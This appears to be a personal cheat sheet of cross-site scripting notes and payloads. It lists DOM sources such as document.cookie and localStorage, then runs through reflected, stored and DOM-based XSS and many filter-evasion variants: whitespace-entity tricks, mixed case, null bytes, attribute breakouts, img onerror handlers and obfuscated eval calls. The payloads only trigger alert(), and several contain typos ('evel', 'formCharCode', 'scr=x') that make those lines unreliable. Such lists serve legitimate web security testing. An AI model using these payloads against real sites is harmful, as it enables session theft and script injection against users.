document.URL
document.documentURI
document.URLUnencoded
document.baseURI
location
document.cookie
document.referrer
window.name
history.pushState
history.replaceState
localStorage
sessionStorage
IndexedDB (mozIndexedDB, webkitIndexedDB, msIndexedDB)
Database

==========================================

Method=GET
Reflected XSS:
<script>alert()</script>

Method=POST
Stored XSS:
<script>alert()</script>

DOM-based XSS:
document.write('... <script>alert(document.domain)</script> ...');

xss-contexts:
html tags
in html attr 
js
client-side template injection

search tags https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

==========================================
MORE

<script>alert("1")</script>
'> or "> <script>alert('1')</script>
<style typr="text.css">body{background:url("javascript:alert('xss')")}</style>


<script>alert(1)</script>
<script >alert(1)</script>
<script    >alert(1)</script>
<script&#9>alert(1)</script>
<script&#10>alert(1)</script>
<script&#13>alert(1)</script>
<ScRipT>alert(1)</sCriPt>
<500script>alert(1)</script>
<script>al%00ert(1)</script>


<input type="text" name="input" value="hello">
<input type="text" name="input" value="><script>alert(1)</script>
<input/type="text" name="input" value="><script>alert(1)</script>
<input&#9type="text" name="input" value="><script>alert(1)</script>
<input&#10type="text" name="input" value="><script>alert(1)</script>
<input&#13type="text" name="input" value="><script>alert(1)</script>
<input/'type="text" name="input" value="><script>alert(1)</script>
<iNpUt type="text" name="input" value="><script>alert(1)</script>

<img onerror="alert(1)"scr=x>
<img onerror="alert(1)'scr=x>
<img onerror=&#34alert(1)&#34scr=x>
<img onerror=&#39alert(1)&#39scr=x>
<img onerror=`alert(1)`scr=x>
<img onerror=&#96alert(1)&#96src=x>

<<script>alert(1)//<</script>

<<input onsubmit=alert(1)>>
&#174input onsubmit=alert(1)&#175

<script>evel('a\u006cert')</script>
<script>evel('al'+'ert(1)')</script>
<script>evel(string.formCharCode()97,108,101,114,116,40,49,41)</script>
